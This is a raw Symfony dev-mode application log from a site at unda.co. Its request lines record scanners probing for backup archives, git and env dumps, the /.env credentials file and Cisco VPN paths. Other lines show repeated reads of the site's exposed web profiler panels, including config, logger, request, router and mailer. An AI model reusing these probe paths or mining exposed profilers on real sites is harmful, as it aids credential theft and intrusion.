[2025-12-18 03:25:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 03:25:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.tar.gz"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.tar.gz\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 03:25:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 03:25:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 03:25:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 03:25:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 03:25:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /git.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /git.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 03:25:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /env.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /env.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 03:25:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /home.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /home.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 03:30:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 03:31:06] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-18 03:31:08] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-18 03:31:15] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"8d2d6c","_route":"_wdt"},"request_uri":"https://unda.co/_wdt/8d2d6c","method":"GET"} []
[2025-12-18 03:31:21] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"e94f9e","_route":"_wdt"},"request_uri":"https://unda.co/_wdt/e94f9e","method":"GET"} []
[2025-12-18 03:31:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 03:31:28] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-18 03:32:56] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-18 03:32:57] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-18 03:34:04] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=104.234.115.18&limit=10&method=GET","method":"GET"} []
[2025-12-18 03:34:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=104.234.115.18&limit=10&method=GET","method":"GET"} []
[2025-12-18 03:36:04] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"6310fa","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/6310fa/search/results?limit=10","method":"GET"} []
[2025-12-18 03:36:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10","method":"GET"} []
[2025-12-18 03:36:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml.gz"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml.gz\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 03:38:22] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"GET"} []
[2025-12-18 03:48:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f4dabc","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f4dabc?panel=config","method":"GET"} []
[2025-12-18 03:48:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-18 03:54:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0397c8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0397c8?panel=logger","method":"GET"} []
[2025-12-18 03:54:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-18 03:56:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17?panel=request","method":"GET"} []
[2025-12-18 03:56:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-18 03:57:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 04:02:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"822e44","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/822e44?panel=events","method":"GET"} []
[2025-12-18 04:02:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
[2025-12-18 04:08:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0409e5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0409e5?panel=swiftmailer","method":"GET"} []
[2025-12-18 04:08:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
[2025-12-18 04:09:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOL+/Java.jar"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOL+/Java.jar\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 04:09:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOL+/a1.jar"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOL+/a1.jar\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 04:10:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0c03d3","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0c03d3?panel=config","method":"GET"} []
[2025-12-18 04:10:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-18 04:14:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1812fa","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1812fa?panel=swiftmailer","method":"GET"} []
[2025-12-18 04:14:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
[2025-12-18 04:17:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 04:27:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 04:32:50] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-18 04:33:19] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-18 04:36:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8ae359","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/8ae359?panel=cache","method":"GET"} []
[2025-12-18 04:36:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-18 04:41:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 04:46:50] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-18 04:54:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ee0387","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/ee0387?panel=dump","method":"GET"} []
[2025-12-18 04:54:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-18 04:56:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 04:56:59] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-18 05:01:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"12dd43","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/12dd43?panel=swiftmailer","method":"GET"} []
[2025-12-18 05:01:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
[2025-12-18 05:12:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap_index.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap_index.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 05:15:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0409e5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0409e5?panel=validator","method":"GET"} []
[2025-12-18 05:15:53] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-18 05:18:24] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0409e5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0409e5?panel=twig","method":"GET"} []
[2025-12-18 05:18:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-18 05:26:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"aa0429","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/aa0429?panel=form","method":"GET"} []
[2025-12-18 05:26:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-18 05:29:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 05:31:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e0b8ae","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e0b8ae?panel=events","method":"GET"} []
[2025-12-18 05:31:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
[2025-12-18 05:32:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b144c2","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b144c2?panel=validator","method":"GET"} []
[2025-12-18 05:32:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-18 05:38:49] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"45c799","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/45c799/search/results?limit=10&method=GET","method":"GET"} []
[2025-12-18 05:38:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
[2025-12-18 05:42:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0409e5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0409e5?panel=router","method":"GET"} []
[2025-12-18 05:42:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
[2025-12-18 05:42:13] request.INFO: Matched route "_profiler_router". {"route":"_profiler_router","route_parameters":{"_controller":"web_profiler.controller.router:panelAction","token":"0409e5","_route":"_profiler_router"},"request_uri":"https://www.unda.co/_profiler/0409e5/router","method":"GET"} []
[2025-12-18 05:42:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 05:43:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d7d5e3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/d7d5e3?panel=cache","method":"GET"} []
[2025-12-18 05:43:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-18 05:43:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d7d5e3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/d7d5e3?panel=time","method":"GET"} []
[2025-12-18 05:43:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-18 05:51:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0397c8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0397c8?panel=time","method":"GET"} []
[2025-12-18 05:51:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
